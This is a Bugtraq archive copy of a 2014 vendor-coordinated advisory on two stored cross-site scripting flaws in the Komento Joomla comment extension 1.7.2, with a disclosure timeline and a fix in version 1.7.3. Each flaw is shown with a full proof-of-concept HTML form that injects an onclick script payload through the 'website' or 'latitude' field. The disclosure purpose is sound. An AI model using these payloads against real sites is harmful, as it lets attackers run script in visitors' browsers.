[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Cross-Site Scripting (XSS) in Komento Joomla Extension
From: High-Tech Bridge Security Research <advisory () htbridge ! com>
Date: 2014-01-23 12:13:35
Message-ID: 20140123121335.79E502C5864E () htbridge ! ch
[Download RAW message or body]
Advisory ID: HTB23194
Product: Komento Joomla Extension
Vendor: Stack Ideas Sdn Bhd.
Vulnerable Version(s): 1.7.2 and probably prior
Tested Version: 1.7.2
Advisory Publication: January 2, 2014 [without technical details]
Vendor Notification: January 2, 2014
Vendor Patch: January 2, 2014
Public Disclosure: January 23, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-0793
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( \
https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Komento \
Joomla Extension, which can be exploited to perform script insertion attacks.
1) Cross-Site Scripting (XSS) in Komento Joomla Extension: CVE-2014-0793
1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data \
passed via the "website" HTTP POST parameter to "/?option=com_komento" URL. A remote \
attacker can submit a comment with specially crafted "Website" field and execute \
arbitrary HTML and script code in browser in context of the vulnerable website when a \
user clicks on the nickname of the malicious author.
The following exploitation example uses the "alert()" JavaScript function to display \
word "immuniweb" when user clicks on the attacker's nickname in comment:
<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl" value="component">
<input type="hidden" name="format" value="ajax"> <input type="hidden" name="no_html" \
value="1"> <input type="hidden" name="component" value="com_content"> <input \
type="hidden" name="cid" value="24"> <input type="hidden" name="comment" \
value="comment"> <input type="hidden" name="parent_id" value="0"> <input \
type="hidden" name="name" value="name"> <input type="hidden" name="email" \
value="email@email.com"> <input type="hidden" name="website" \
value='http://www.htbridge.com" onclick="javascript:alert(/immuniweb/);"'>
<input type="hidden" name="subscribe" value="false"> <input type="hidden" \
name="latitude" value=''> <input type="hidden" name="longitude" value="1"> <input \
type="hidden" name="address" value="1"> <input type="hidden" name="contentLink" \
value="http://joomla/"> <input type="hidden" name="pageItemId" value="435"> <input \
type="hidden" name="option" value="com_komento"> <input type="hidden" \
name="namespace" value="site.views.komento.addcomment"> <input type="hidden" \
name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> \
</form>
1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data \
passed via the "latitude" HTTP POST parameter to "/?option=com_komento" URL. A remote \
attacker can submit a comment with specially crafted "latitude" field and execute \
arbitrary HTML and script code in browser in context of the vulnerable website when a \
user clicks on the address of the malicious author.
The following exploitation example uses the "alert()" JavaScript function to display \
word "immuniweb" when user clicks on the attacker's address in comment:
<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl" value="component">
<input type="hidden" name="format" value="ajax"> <input type="hidden" name="no_html" \
value="1"> <input type="hidden" name="component" value="com_content"> <input \
type="hidden" name="cid" value="24"> <input type="hidden" name="comment" \
value="comment"> <input type="hidden" name="parent_id" value="0"> <input \
type="hidden" name="name" value="name"> <input type="hidden" name="email" \
value="email@email.com"> <input type="hidden" name="website" \
value='www.htbridge.com'> <input type="hidden" name="subscribe" value="false"> \
<input type="hidden" name="latitude" value='" \
onclick="javascript:alert(/imuniweb/);">'> <input type="hidden" name="longitude" \
value="1"> <input type="hidden" name="address" value="1"> <input type="hidden" \
name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId" \
value="435"> <input type="hidden" name="option" value="com_komento"> <input \
type="hidden" name="namespace" value="site.views.komento.addcomment"> <input \
type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" \
id="btn"> </form>
-----------------------------------------------------------------------------------------------
Solution:
Update to Komento 1.7.3
More Informaion:
http://stackideas.com/downloads/changelog/komento
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23194 - https://www.htbridge.com/advisory/HTB23194 - \
Cross-Site Scripting (XSS) in Komento Joomla Extension. [2] Komento Joomla Extension \
- http://stackideas.com/ - Komento is a Joomla comment extension for articles and \
blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop. [3] Common \
Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope \
and free for public use, CVE ® is a dictionary of publicly known information security \
vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - \
http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a \
formal list of software weakness types. [5] ImmuniWeb ® - \
http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web \
application security assessment solution with SaaS delivery model that combines \
manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic